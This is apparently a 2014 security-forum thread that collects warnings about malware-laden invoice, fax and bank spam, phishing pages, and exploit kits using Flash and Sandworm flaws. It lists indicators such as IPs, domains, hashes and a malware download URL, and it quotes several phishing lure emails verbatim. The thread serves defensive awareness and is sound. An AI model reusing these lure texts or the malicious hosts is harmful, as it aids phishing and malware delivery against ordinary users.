Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most (if not all) malicious files that are attached to emails will have a faked extension..."
- http://blog.dynamoo.com/2014/10/adobe-billing-adobe-invoice-spam-adb.html
20 Oct 2014
Screenshot: https://1.bp.blogspot.com/-mt-vGbR2Q-U/VEUFltRbPGI/AAAAAAAAF3E/b3_TOFcDpHk/s1600/adobe.png
> https://www.virustotal.com/en-gb/file/bc79dea26a2ec94646dcbad540d3921198c46701359539925e530839aa68fb13/analysis/1413809174/
... Behavioural information
TCP connections
62.75.182.94: https://www.virustotal.com/en-gb/ip-address/62.75.182.94/information/
208.89.214.177: https://www.virustotal.com/en-gb/ip-address/208.89.214.177/information/
___
Dropbox phish - hosted on Dropbox
- http://www.symantec.com/connect/blogs/dropbox-users-targeted-phishing-scam-hosted-dropbox
Updated: 18 Oct 2014 - "... In this scam, messages included links to a -fake- Google Docs login page hosted on Google itself. We continue to see millions of phishing messages every day, and recently we saw a similar scam targeting Dropbox users. The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a -fake- Dropbox login page, hosted on Dropbox itself.
Fake Dropbox login page:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%201.png
The -fake- login page is hosted on Dropbox's user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing. The page looks like the real Dropbox login page, but with one crucial difference. The scammers are interested in phishing for more than just Dropbox credentials; they have also included logos of popular Web-based email services, suggesting that users can log in using these credentials as well. After clicking "Sign in," the user’s credentials are sent to a PHP script on a compromised Web server. Credentials are also submitted over SSL, which is critical for the attack's effectiveness. Without this, victims would see an unnerving security warning.
Security warning:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%202.jpg
Upon saving or emailing the user's credentials to the scammer, the PHP script simply -redirects- the user to the real Dropbox login page. Although the page itself is served over SSL, and credentials are sent using the protocol, some resources on the page (such as images or style sheets) are not served over SSL. Using non-SSL resources on a page served over SSL shows warnings in recent versions of some browsers. The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications. Symantec reported this phishing page to Dropbox and they immediately took the page down..."
:fear::fear: :mad:
AplusWebMaster
2014-10-21, 15:06
FYI...
Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/humber-merchants-group-industrial-invoices-word-doc-malware/
21 Oct 2014 - "An email pretending to come from 'Humber Merchants Group' ps [random number]@humbermerchants .co.uk with a word document attachment and the subject of 'Industrial Invoices' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Attached are accounting documents from Humber Merchants
Humber Merchants Group
Head Office:
Parkinson Avenue
Scunthorpe
North Lincolnshire
DN15 7JX
Tel: 01724 860331
Fax: 01724 281326 ...
21 October 2014: 15040BII3646501.doc - Current Virus total detections: 0/52* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2471f4a0febbfede40f5d700553eb28d97519ac49454bcc79f0fb7383559198b/analysis/1413890645/
___
Fake Adobe Invoice Spam
- http://threattrack.tumblr.com/post/100594804508/adobe-invoice-spam
Oct 21, 2014 - "Subjects Seen:
Adobe Invoice
Typical e-mail details:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a62cae97486096c615aa19538d2b5ebb/tumblr_inline_ndt0qkAetU1r6pupn.png
Malicious File Name and MD5:
invoice.zip (CABA79FCEB5C9FEF222C89C423AA2485)
invoice.exe (29684FBB98C1883A7A08977CB23E90B6)
Tagged: Adobe, Wauchos
___
Fake Invoice SPAM - malware
- http://myonlinesecurity.co.uk/please-find-attached-pi-copies-invoice-malware/
21 Oct 2014 - "An email pretending to come from cato-chem .com < sales@ cato-chem .com > with a fake invoice has a subject of Please find attached PI copies of Invoice is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/cato-chem_fake-invoice.png
21 October 2014: proforma invoice.zip: Extracts to proforma invoice.exe
Current Virus total detections: 17/54*. This Please find attached PI copies of Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a barcode as the icon instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/331d8fbfd2eecd6141a0bc61d3091c1d7e0311a0d8b6c0a29e500052f99c1ac2/analysis/1413858604/
___
ThetaRay turns to maths to detect cyber threats
- http://www.reuters.com/article/2014/10/21/us-thetaray-cybersecurity-idUSKCN0IA1JV20141021
Oct 21, 2014 - "As businesses face a growing threat of cyber attacks, Israeli start-up ThetaRay is betting on maths to provide early detection, enabling the shutdown of systems before damage can be done. The year-old company's first investor was venture capital firm Jerusalem Venture Partners. It is now also backed by heavyweights like General Electric, which uses ThetaRay to protect critical infrastructure such as power plants, and Israel's biggest bank, Hapoalim, which deployed the technology to detect bank account anomalies... Cyber security providers are moving away from protecting gateways with defenses such as firewalls to focus on detecting and preventing attacks before they penetrate organizations... Security experts estimate it can take more than -200- days to identify a cyber attack once it's been launched... Once a threat has been detected, ThetaRay leaves it up to humans to decide whether or not to shut down the system..."
:mad: :fear:
AplusWebMaster
2014-10-22, 16:14
FYI...
Fake Debt Recovery SPAM - PDF malware
- http://myonlinesecurity.co.uk/bd-digital-supplies-commercial-debt-recovery-fake-pdf-malware/
22 Oct 2014 - "An email coming from random senders pretending to be B&D Digital Supplies or B&D Computers which is all about debt recovery and threatening legal action with a subject of 'Commercial Debt Recovery' , Ref No: [ random numbers]is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/commercial-debt-recovery.png
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___
Fake customer service SPAM - doc malware
- http://myonlinesecurity.co.uk/customer-service-word-doc-malware/
22 Oct 2014 - "an email pretending to have a word document invoice attachment with a subject of Reference: [random characters] coming from [random name] 'customer service' at an unspecified company is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
This email contains an invoice file attachment ID:VZY563200VA
Thanks!
Kelli Horn .
22 October 2014: ENC094126XJ.doc - Current Virus total detections: 0/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/d328ceac71beead36034d6f74671a84c197cf2fa9e2155885aa720363045eb0e/analysis/1413973355/
___
Fake Malformed or infected word docs with embedded macro viruses
- http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
22 Oct 2014 - "We are seeing loads of emails with Malformed or infected word docs with embedded macro viruses they are what appears to be a genuine word doc attached which is malformed and contains a macro or vba script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them. Opening this malicious word document will infect you if Macros are enabled and simply previewing it in windows explorer or your email client might well be enough to infect you... Do -not- open word docs received in an email without scanning them with your antivirus first and be aware that there are a lot of dodgy word docs spreading that WILL infect you with no action from you if you are still using an outdated or vulnerable version of word. This is a good reason to update your office programs to a recent version and stop using office 2003 and 2007. The risks in using older version are starting to outweigh the convenience, benefits and cost of keeping an old version going... All modern versions of word and other office programs, that is 2010, 2013 and 365, should open word docs, excel files and PowerPoint etc that are downloaded from the web or received in an email automatically in “protected view” that stops any embedded malware or macros from being displayed and running. Make sure protected view is set in all office programs to protect you and your company from these sorts of attacks..."
- http://blog.dynamoo.com/2014/10/this-email-contains-invoice-file.html
22 Oct 2014
Screenshot: https://3.bp.blogspot.com/-1zwDnotABo4/VEeoiHJ74iI/AAAAAAAAF3Y/mKs9rkfW_oY/s1600/image1.gif
VT1: https://www.virustotal.com/en-gb/file/992fefe6c60d93693be7790a03880cc39a6cc7eb197c8e28bafd53c5ebbfe638/analysis/1413981604/
... Behavioural information
DNS requests
VBOXSVR.ovh.net: 213.186.33.6: https://www.virustotal.com/en-gb/ip-address/213.186.33.6/information/
TCP connections
178.250.243.114: https://www.virustotal.com/en-gb/ip-address/178.250.243.114/information/
91.240.238.51: https://www.virustotal.com/en-gb/ip-address/91.240.238.51/information/
VT2: https://www.virustotal.com/en-gb/file/73602b79321bc8190aed0aa9dd8ea0ef8997a37e92a64932ec258cb1b74f0788/analysis/1413982865/
___
Fake Wells Fargo SPAM – PDF malware
- http://myonlinesecurity.co.uk/wells-fargo-new-secure-message-fake-pdf-malware/
22 Oct 2014 - "An email pretending to come from Wells Fargo with a subject of 'You have a new Secure Message' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a secure message
Read your secure message by download AccountDocuments-10345.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting...
22 October 2014: document_013982_pdf.zip: Extracts to: document_013982_pdf.exe
Current Virus total detections: 5/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/de18e69c371dbd2f684e2dbcb40fa768c5ed8739182e75f4be90d81907e9e247/analysis/1413986180/
... Behavioural information
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
82.98.161.71: https://www.virustotal.com/en-gb/ip-address/82.98.161.71/information/
188.165.237.144: https://www.virustotal.com/en-gb/ip-address/188.165.237.144/information/
80.157.151.17: https://www.virustotal.com/en-gb/ip-address/80.157.151.17/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en-gb/ip-address/173.194.71.127/information/
___
Flash Player exploit in-the-wild - CVE-2014-0569
- https://blog.malwarebytes.org/exploits-2/2014/10/cyber-criminals-quickly-adopt-critical-flash-player-vulnerability/
Oct 22, 2014 - "... less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569*) was patched and made public:
* https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
The vulnerability had been privately reported to Adobe through the Zero Day Initiative group giving the firm the time to fix the issue before it became known to the world. Typically security researchers and criminals will be very attentive to such news and skilled reverse engineers will start looking at the patch to be able to reconstruct the exploit. All things considered, there is normally a certain amount of time before a proof of concept is released and then a little more time before that poc is weaponized by the bad guys... Kafeinee**... stumbled upon that same CVE in a real world exploit kit (Fiesta EK) only one -week- after the official security bulletin had been published... That means we have less and less time to deploy and test security patches. Perhaps this is not too much of a deal for individuals, but it can be more difficult for businesses which need to roll out patches on dozens of machines, hoping doing so will not cause malfunctions in existing applications. In any case, this was our first chance to test CVE-2014-0569 in the wild by triggering the Fiesta EK against Malwarebytes Anti-Exploit:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/FiestaCVE-2014-0569.png
It is crucial to patch any system running outdated Flash Player versions as soon as possible! You can check the version you are running (make sure to do this in all the browsers you use) by going here:
>> http://www.adobe.com/software/flash/about/
The bad guys are not going to run short of vulnerabilities they can weaponize at a quicker rate than ever before. This leaves end-users with very little room for mistakes such as failing to diligently apply security patches -sooner- rather than later..."
** http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html
> https://blog.malwarebytes.org/tag/fiesta-ek/
:mad: :fear:
AplusWebMaster
2014-10-23, 15:46
FYI...
Fake 'Order Confirmation' SPAM
- http://blog.dynamoo.com/2014/10/fake-supertouchcom-allied-international.html
23 Oct 2014 - "This fake Order Confirmation spam pretends to come from supertouch.com / Allied International Trading Limited but doesn't. The email is a -forgery- originating from an organised crime ring, it does not originate from supertouch .com / Allied International Trading Limited nor have their systems been compromised in any way.
From: Elouise Massey [Elouise.Massey@ supertouch .com]
Date: 23 October 2014 10:52
Subject: Order Confirmation
Hello,
Thank you for your order, please check and confirm.
Kind Regards
Elouise
Allied International Trading Limited ...
In the sample I received, the attachment was -corrupt- but should have been a file a malicious Word document S-CON-A248-194387.doc. The document and payload is exactly the same as the one being sent out today with this spam run[1] (read that post for more details) and is very poorly detected, although blocking access to the following IPs and domains might help mitigate against it:
87.106.84.226
84.40.9.34
jvsfiles .com "
1] http://blog.dynamoo.com/2014/10/fake-humber-merchants-group.html
62.75.182.94: https://www.virustotal.com/en/ip-address/62.75.182.94/information/
___
Fake 'bank detail' SPAM - trojan
- http://blog.mxlab.eu/2014/10/23/fake-email-regarding-bitstamp-new-banking-details-contains-trojan/
Oct 23, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “New bank details”. This email is sent from the spoofed address “”Bitstamp .net” <no_reply@ bitstamp .net>”, while the real SMTP sender is AmericanExpress@ welcome .aexp .com, and has the following body:
New banking details
Dear Bitstamp clients,
We would like to inform you that Bitstamp now has new bank details, please check attached file.
We would like to assure those of you who sent deposits to our old details that our old IBAN is still active and your transfers, if otherwise sent with correct information, should arrive without a problem.
Please note that SEPA transfers usually take 1 to 3 business days to arrive and would kindly ask those waiting for your SEPA transfers longer than usually to please send us a transfer confirmation so that we can examine our bank account log and locate your transfers.
Also for those waiting on deposits we ask for your patience; we have accumulated a long list of transfers which lack information or contain wrong information which means we need to manually go through all of them instead of our system sorting them automatically.
Best regards
CEO, Nejc Kodrič
Bitstamp LIMITED
The attached ZIP file has the name bank details.zip and contains the 24 kB large file bank details.scr. The trojan is known as Troj.W32.Gen, a variant of Win32/Kryptik.COEK, HEUR/QVM20.1.Malware.Gen or Mal/Generic-S. At the time of writing, 4 of the 53 AV engines did detect the trojan at Virus Total*. Now, MX Lab has also intercepted some emails -without- the malicious attachment but be aware that this email is a risk..."
* https://www.virustotal.com/en/file/83fc76ba29762e28fc80c08085003b811a1fa3eae51635f99ff35b4022fd1769/analysis/1414073432/
... Behavioural information
DNS requests
VBOXSVR. ovh .net: 213.186.33.6: https://www.virustotal.com/en/ip-address/213.186.33.6/information/
___
Two exploit kits prey on Flash Player flaw patched only last week
- http://net-security.org/malware_news.php?id=2892
23.10.2014 - "Two exploit kits prey on Flash Player flaw patched only last week... The integer overflow vulnerability in question (CVE-2014-0569*) can allow attackers to execute arbitrary code via unspecified vectors, and is deemed critical (high impact, easily exploitable)... the time period was very short, and technical information about the vulnerability and exploit code hasn't yet been shared online... The exploit kits are used to deliver the usual assortment of malware, and some of the variants have an extremely low detection rate... If you use Adobe Flash Player, and you haven't implemented the latest patches, now would be a good time to rectify that mistake."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0569 - 10.0
- http://atlas.arbor.net/briefs/index#1049793989
Elevated Severity
23 Oct 2014
- http://www.securitytracker.com/id/1031019
CVE Reference: CVE-2014-0558, CVE-2014-0564, CVE-2014-0569
Oct 14 2014
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Solution: The vendor has issued a fix (13.0.0.250 extended support release, 15.0.0.189 for Windows/Mac, 11.2.202.411 for Linux)...
Flash 15.0.0.189 released: https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
Oct 14, 2014
For I/E: http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_active_x.exe
For Firefox (Plugin-based browsers): http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_plugin.exe
Flash test site: http://www.adobe.com/software/flash/about/
___
Fake 'Order Confirmation' SPAM
- http://blog.dynamoo.com/2014/10/fake-supertouchcom-allied-international.html
23 Oct 2014 - "This -fake- Order Confirmation spam pretends to come from supertouch .com / Allied International Trading Limited - but doesn't. The email is a -forgery- originating from an organised crime ring, it does not originate from supertouch .com / Allied International Trading Limited nor have their systems been compromised in any way.
From: Elouise Massey [Elouise.Massey@ supertouch .com]
Date: 23 October 2014 10:52
Subject: Order Confirmation
Hello,
Thank you for your order, please check and confirm.
Kind Regards
Elouise
Allied International Trading Limited ...
In the sample I received, the attachment was corrupt but should have been a file a malicious Word document S-CON-A248-194387.doc. The document and payload is exactly the same as the one being sent out today with this spam run* (read that post for more details) and is very poorly detected, although -blocking- access to the following IPs and domains might help mitigate against it:
87.106.84.226
84.40.9.34
jvsfiles .com "
* http://blog.dynamoo.com/2014/10/fake-humber-merchants-group.html
___
Fake VoiceMail SPAM
- http://blog.dynamoo.com/2014/10/voice-mail-voicemailsendervoicemailcom.html
23 Oct 2014 - "Before you open something like this.. think if you really get voice mail notifications through your email. No? Well, -don't- open it.
From: "Voice Mail" [voicemail_sender@ voicemail .com]
Date: Thu, 23 Oct 2014 14:31:22 +0200
Subject: voice message from 598-978-8974 for mailbox 833
You have received a voice mail message from 598-978-8974
Message length is 00:00:33. Message size is 264 KB.
Download your voicemail message from dropbox service below (Google Disk
Drive Inc.) ...
Clicking the link goes to a script that detects if the visitor is running Windows, if so it downloads a file doc_9231-92_pdf.zip from the target system which in turn contains a malicious executable doc_9231-92_pdf.exe which has a VirusTotal detection rate of 4/51*... 188.165.214.6 is rather unsurprisingly allocated to OVH France. It also drops a couple of executables onto the system... Recommended blocklist:
188.165.214.6
inaturfag .com "
* https://www.virustotal.com/en-gb/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414075720/
___
Fake BoA SPAM – PDF malware
- http://myonlinesecurity.co.uk/mamie-french-bank-america-unknown-incoming-wire-fake-pdf-malware/
23 Oct 2014 - "'Mamie French Bank of America Unknown incoming wire' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The banking activity with today’s posting date shows Electronic Fund Transfer (EFT) that has been received. Our bank has noted the following information:
EFT Amount: $ 6,200.00
Remitted From: SSA TREAS 310 MISC PAY
Designated for: UNKNOWN
Please download and open attachment with full imformation about this Electronic Fund Transfer payment.
If you confirm that it belongs to your agency or department, please email back or give us a call. Then, our office needs to receive a completed General Deposit no later than 10:00 a.m. tomorrow.
Note: If these funds cannot be identified or if no one claims this EFT, we are required to process the return of this EFT by 10:00 a.m., June 24, 2014.
Thank you.
Mamie French
Senior Accountant
Bank of America ...
23 October 2014: electronic_fund_transfer.zip: Extracts to: electronic_fund_transfer.scr
Current Virus total detections: 10/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414081814/
:fear: :mad:
AplusWebMaster
2014-10-24, 14:34
FYI...
Fake Invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/invoice-8014042-october-word-doc-malware/
24 Oct 2014 - "'invoice 8014042 October' pretending to come from Sandra Lynch with a malformed word doc attachment containing a macro virus is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8014042 Account No 5608014042.
Thanks very much
Kind Regards
Sandra Lynch
24 October 2014: invoice_8014042.doc : Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/9659be0ec03fafcea7200032cdf3434ba14c99b9a8e0c3a16f5419d3817c48de/analysis/1414141144/
___
Fake Fax SPAM.. again.
- http://blog.dynamoo.com/2014/10/youve-received-new-fax-spam-again.html
24 Oct 2014 - "Another day, another -fake- fax spam.
From: Fax [fax@ victimdomain .com]
To: luke.sanson@ victimdomain .com
Date: 24 October 2014 10:54
Subject: You've received a new fax
New fax at SCAN2383840 from EPSON by https://victimdomain.com
Scan date: Fri, 24 Oct 2014 15:24:22 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(eFax Drive is a file hosting service operated by J2, Inc.)
The link in the email goes to a script which (if the the browser settings are correct) downloads a file document_92714-872_pdf.zip which in turn contains a malicious executable document_92714-872_pdf.exe which has a VirusTotal detection rate of 3/54*... The malware also drops two executables on the system, kcotk.exe (VT 0/53**...) and ptoma.exe (VT 2/51***...)... Recommended blocklist:
188.165.214.6
rodgersmith .com "
* https://www.virustotal.com/en/file/d9f637e2750f01b7d07451b4262a5d560ef2b5743db0a26881c4ebbd9e04373f/analysis/1414145184/
** https://www.virustotal.com/en-gb/file/8483369c80851bb2ecbf221b9d4c01dbd2980b7d3eb3c5829eccad62bef80651/analysis/1414145764/
*** https://www.virustotal.com/en-gb/file/b4798bbf747180a96b476af6adf167bd62e5c8b5d92b0c994e8a42a45c3bd19e/analysis/1414145784/
___
Widespread malvertising - delivered ransomware
- http://net-security.org/malware_news.php?id=2894
24.10.2014 - "A newer version of the Cryptowall ransomware has been delivered to unsuspecting Internet users via malicious ads shown on a considerable number of high-profile websites, including properties in the Yahoo, Match.com, and AOL domains. According to Proofpoint's calculations*, the malvertising campaign started in late September, picked up the pace this month, and lasted until October 18 and likely even a bit longer... In this campaign, the attackers used already existing ads for legitimate products, and submitted it to at least three major ad network members (Rubicon Project, Right Media/Yahoo Advertising, and OpenX). Visitors to the sites that ended up serving the malicious ads were automatically infected with the ransomware if they used software with vulnerabilities exploitable by the FlashPack Exploit Kit. The ransomware then encrypted the victims' hard drive and asks for money in return for the decryption key. Unfortunately, even if the ransom is paid, there is no guarantee that the victim will actually receive the key. The ransom is supposed to be paid in Bitcoin, and the addresses the criminals used for this purpose are C&C server-generated and many... This particular campaign now seems to be over - all the affected parties (optimizers and ad networks) have been notified, and the malicious ads pulled. Still, that doesn't mean that the attackers have not switched to spreading CryptoWall 2.0 via other means..."
* http://www.proofpoint.com/threatinsight/posts/malware-in-ad-networks-infects-visitors-and-jeopardizes-brands.php
___
Ebola-themed emails deliver malware, exploit Sandworm vulnerability (MS14-060)
- http://net-security.org/malware_news.php?id=2895
24.10.2014 - "US CERT has recently issued a warning* about malware-delivery campaigns using users' fear of the Ebola virus and its spreading as a bait. One of the most prolific campaigns is the one that -impersonates- the World Health Organization:
> http://www.net-security.org/images/articles/who-spam-24102014.jpg
The emails in question initially -linked- to the -malware- a variant of the DarkKomet RAT tool, used by attackers to access and control the victim's computer remotely and steal information. After a while, the attackers began to attach the malware directly to the message, as access to the malicious file hosted on a popular cloud data storage service was blocked quickly by service administrators, noted Tatyana Shcherbakova:
> https://securelist.com/blog/spam-test/67344/a-false-choice-the-ebola-virus-or-malware/
According to Websense researchers**, Ebola-themed malicious emails and documents are also being used by attackers taking advantage of the recently discovered Sandworm vulnerability (CVE-2014-4114***)..."
* https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014
** http://community.websense.com/blogs/securitylabs/archive/2014/10/23/Ebola-Spreads-_2D00_-In-Cyber-Attacks-Too.aspx
*** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114 - 9.3 (HIGH)
___
Phalling for the phish...
- http://blog.dynamoo.com/2014/10/do-people-really-fall-for-this.html
24 Oct 2014 - "... a simple phishing spam..
From: info@ kythea .gr
Date: 24 October 2014 13:50
Subject: payment
this mail is to inform you that the payment have been made
see the attached file for the payment slip
ANTON ARMAS
Attached is a file payment Slip (2).html which displays a popup alert:
You have been signed out of this account this may have happened automatically cause the attachement needs authentication. to continue using this account, you will need to sign in again. this is done to protect your account and to ensure the privacy of your information
The victim then gets sent to a phishing page, in this case at uere.bplaced .net/blasted/tozaiboeki.webmail .html which looks like this..
> https://4.bp.blogspot.com/-dliSNtwDjPk/VEpWNYc6hyI/AAAAAAAAF48/S74-pPcyPuI/s1600/multiphish.jpg
... do people really fall for this? The frightening answer is.. probably, yes."
bplaced .net: 5.9.107.19: https://www.virustotal.com/en/ip-address/5.9.107.19/information/
:mad: :fear:
AplusWebMaster
2014-10-25, 14:24
FYI...
Fake 'New order' SPAM - malware
- http://myonlinesecurity.co.uk/daniela-lederer-re-new-order-malware/
25 Oct2014 - "'Daniela Lederer Re: New Order' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Daniela-Lederer-new-order.png
25 October 2014: J2134457863.zip: Extracts to: J2134457863.exe
Current Virus total detections: 14/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/e5b881143bd10304d8211fc4f2708839361cab6af59934d327150bcb0d098e86/analysis/1414216443/
:fear: :mad:
AplusWebMaster
2014-10-27, 13:45
FYI...
Fake KLM e-Ticket SPAM – PDF malware
- http://myonlinesecurity.co.uk/klm-e-ticket-fake-pdf-malware/
27 Oct 2014 - "'KLM e-Ticket' pretending to come from e-service @klm .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/klm_air_ticket.png
27 October 2014: e-Ticket_klm_Itinerary _pdf.zip: Extracts to: e-Ticket_klm_Itinerary _pdf.exe
Current Virus total detections: 2/53* . This 'KLM e-Ticket' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0a28086129c3e01e37868532f79cd72acb21d88443fb0a377b3b8a3c184ad88/analysis/1414404573/
___
Fake 'invoice xxxxxx October' SPAM - malicious Word doc
- http://blog.dynamoo.com/2014/10/randomly-generated-invoice-xxxxxx.html
27 Oct 2014 - "There have been a lot of these today:
From: Sandra Lynch
Date: 27 October 2014 12:29
Subject: invoice 0544422 October
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 0544422 Account No 5600544422.
Thanks very much
Kind Regards
Sandra Lynch
The numbers in the email are randomly generated, as is the filename of the attachment (in this example it was invoice_0544422.doc). The document itself is malicious and has a VirusTotal detection rate of 5/53*. Inside the Word document is a macro that attempts to download an execute a malicious binary from http ://centrumvooryoga .nl/docs/bin.exe which is currently 404ing which is a good sign. There's a fair chance that the spammers will use this format again, so always be cautious of unsolicited email attachments."
* https://www.virustotal.com/en/file/7dcc2db732fc3c3c8bfbee2539644c8fbc19648d6b82c2fd35bc3a513cd059e6/analysis/1414436717/
83.96.174.219: https://www.virustotal.com/en/ip-address/83.96.174.219/information/
___
Phish... linked with “Dyre” Banking Malware
- https://www.us-cert.gov/ncas/alerts/TA14-300A
Oct 27, 2014 - "Systems Affected: Microsoft Windows. Overview:
Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payloads... Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware... The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors... Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in -unpatched- versions of Adobe Reader... After successful exploitation, a user's system will download Dyre banking malware..."
___
FTC gets courts to shut down tech support scammers
- http://www.theinquirer.net/inquirer/news/2377916/us-ftc-gets-courts-to-shut-down-tech-support-scammers
Oct 27 2014 - "... the company, which called itself PairSys, would call people at home and claim to be from Microsoft or Facebook. This is a common scam, and the caller will often claim that the victim has a PC-based problem. In some cases people fall for this. It is estimated that PairSys made $2.5m from the scam and that it employed online adverts as well as phone calls as lures. "The defendants behind Pairsys targeted seniors and other vulnerable populations, preying on their lack of computer knowledge to sell ‘security' software and programs that had no value at all," said Jessica Rich, director of the FTC's Bureau of Consumer Protection... The defendants in the case, Pairsys, Uttam Saha and Tiya Bhattacharya, have agreed to the terms of a preliminary injunction, which includes an instruction to shut down their websites and telephone lines and not to sell on their customer data lists."
* http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam
> http://www.consumer.ftc.gov/blog
:fear: :mad:
AplusWebMaster
2014-10-28, 17:16
FYI...
Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
28 Oct 2014 - "An email saying 'Please find attached INVOICE number 224244 from Power EC Ltd' pretending to come from soo.sutton[random number]@ powercentre .com with a subject of 'INVOICE [random number] from Power EC Ltd' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached INVOICE number 224244 from Power EC Ltd
28 October 2014 : INVOICE263795.doc - Current Virus total detections: 3/54*
